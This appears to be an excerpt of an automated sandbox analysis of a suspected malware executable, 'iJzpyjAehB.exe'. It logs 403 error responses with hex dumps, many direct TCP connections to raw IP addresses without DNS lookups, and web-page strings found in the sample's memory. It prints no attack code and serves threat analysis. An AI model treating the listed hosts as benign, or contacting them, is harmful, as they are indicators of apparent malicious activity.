0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 33 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 62 61 63 6b 6c 69 6e 6b 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 32 29 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 42 61 63 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <title>i-MSCP internet - Multi Server Control Panel - Error 403</title> <meta charset="utf-8"> <meta name="application-name" content="i-MSCP"> <meta name='robots' content='nofollow, noindex'> <link rel="icon" href="/errors/inc/favicon.ico"> <link rel="stylesheet" href="/errors/inc/errordocs.css"> <!--[if (IE 7)|(IE 8)]> <link rel="stylesheet" href="/errors/inc/ie78overrides.css"> <![endif]--></head><body><div id="outer"> <div id="inner"> <h1>Error 403</h1> <p>Fo
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:56 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:56 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Fri, 10 Mar 2023 06:56:57 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: TaYjksP2/mDutzhfFData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Fri, 10 Mar 2023 06:56:57 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: S6cE3JM7/PJV7GkKpData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:57 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.1.81.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.1.81.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.1.81.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 211.13.196.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 211.13.196.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/PohlFoodService" target="_blank"> equals www.facebook.com (Facebook)
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.linkedin.com/company/pohl-food-service" target="_blank"> equals www.linkedin.com (Linkedin)
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-6def677" href="https://www.youtube.com/channel/UCvpY2zO1GRvxBdgkg7BUm-A" target="_blank"> equals www.youtube.com (Youtube)
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/PohlFoodService" /> equals www.facebook.com (Facebook)
                      Source: iJzpyjAehB.exe, 00000000.00000003.398318769.0000000002DE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FConstruction-Bergeroy-inc%2F212271258798965&amp;width=430&amp;colorscheme=light&amp;show_faces=false&amp;stream=false&amp;header=false&amp;height=75" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:430px; height:75px;" allowtransparency="true"></iframe> equals www.facebook.com (Facebook)
                      Source: iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <div class="mfn-main-slider mfn-layer-slider"><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript">jQuery(function() { _initLayerSlider( '#layerslider_78_3y2sfrlz14i5', {createdWith: '6.5.8', sliderVersion: '7.5.3', pauseOnHover: 'enabled', skin: 'v6', sliderFadeInDuration: 350, globalBGSize: 'cover', hoverPrevNext: false, navStartStop: false, showCircleTimer: false, useSrcset: true, skinsPath: 'http://www.com-sit.com/wp-content/plugins/LayerSlider/assets/static/layerslider/skins/', performanceMode: true}); });</script><div id="layerslider_78_3y2sfrlz14i5" class="ls-wp-container fitvidsignore" style="width:1980px;height:400px;margin:0 auto;margin-bottom: 0px;"><div class="ls-slide" data-ls="duration:7000;kenburnsscale:1.2;"><img width="2000" height="667" src="https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK.jpg" class="ls-bg" alt="COMS.I.T. - Auf einen Blick" decoding="async" srcset="https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK.jpg 2000w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-300x100.jpg 300w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-768x256.jpg 768w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-1024x342.jpg 1024w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-260x87.jpg 260w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-50x17.jpg 50w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-150x50.jpg 150w" sizes="(max-width: 2000px) 100vw, 2000px" /><ls-layer style="font-size:36px;color:#000;text-align:left;font-style:normal;text-decoration:none;text-transform:none;font-weight:400;letter-spacing:0px;background-position:0% 0%;background-repeat:no-repeat;top:38px;left:945px;width:560px;height:309px;" class="ls-l ls-media-layer"><iframe width="560" height="315" frameborder="0" allowfullscreen data-src="https://www.youtube.com/embed/e1ZfpowjQRo"></iframe></ls-layer></div><div class="ls-slide" data-ls="duration:7000;kenburnsscale:1.2;"><img width="1980" height="726" src="https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1.jpg" class="ls-bg" alt="" decoding="async" srcset="https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1.jpg 1980w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-300x110.jpg 300w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-768x282.jpg 768w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-1024x375.jpg 1024w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-260x95.jpg 260w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-50x18.jpg 50w, https://www.com-sit.com/wp-content/uploads
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <div class="mfn-main-slider mfn-layer-slider"><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript">jQuery(function() { _initLayerSlider( '#layerslider_78_fdu3k1p525yr', {createdWith: '6.5.8', sliderVersion: '7.5.3', pauseOnHover: 'enabled', skin: 'v6', sliderFadeInDuration: 350, globalBGSize: 'cover', hoverPrevNext: false, navStartStop: false, showCircleTimer: false, useSrcset: true, skinsPath: 'http://www.com-sit.com/wp-content/plugins/LayerSlider/assets/static/layerslider/skins/', performanceMode: true}); });</script><div id="layerslider_78_fdu3k1p525yr" class="ls-wp-container fitvidsignore" style="width:1980px;height:400px;margin:0 auto;margin-bottom: 0px;"><div class="ls-slide" data-ls="duration:7000;kenburnsscale:1.2;"><img width="2000" height="667" src="https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK.jpg" class="ls-bg" alt="COMS.I.T. - Auf einen Blick" decoding="async" srcset="https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK.jpg 2000w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-300x100.jpg 300w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-768x256.jpg 768w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-1024x342.jpg 1024w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-260x87.jpg 260w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-50x17.jpg 50w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-150x50.jpg 150w" sizes="(max-width: 2000px) 100vw, 2000px" /><ls-layer style="font-size:36px;color:#000;text-align:left;font-style:normal;text-decoration:none;text-transform:none;font-weight:400;letter-spacing:0px;background-position:0% 0%;background-repeat:no-repeat;top:38px;left:945px;width:560px;height:309px;" class="ls-l ls-media-layer"><iframe width="560" height="315" frameborder="0" allowfullscreen data-src="https://www.youtube.com/embed/e1ZfpowjQRo"></iframe></ls-layer></div><div class="ls-slide" data-ls="duration:7000;kenburnsscale:1.2;"><img width="1980" height="726" src="https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1.jpg" class="ls-bg" alt="" decoding="async" srcset="https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1.jpg 1980w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-300x110.jpg 300w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-768x282.jpg 768w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-1024x375.jpg 1024w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-260x95.jpg 260w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-50x18.jpg 50w, https://www.com-sit.com/wp-content/uploads
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://2.gravatar.com/avatar/8f1795d9778dd5337c87d22e0464e1c3?s=96&amp;d=mm&amp;r=g
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://SpielautomatenKostenlosSpielen.eu
                      Source: iJzpyjAehB.exe, 00000000.00000002.603177646.0000000007565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aro.ex-olive.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.267669316.0000000008D00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.414643624.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
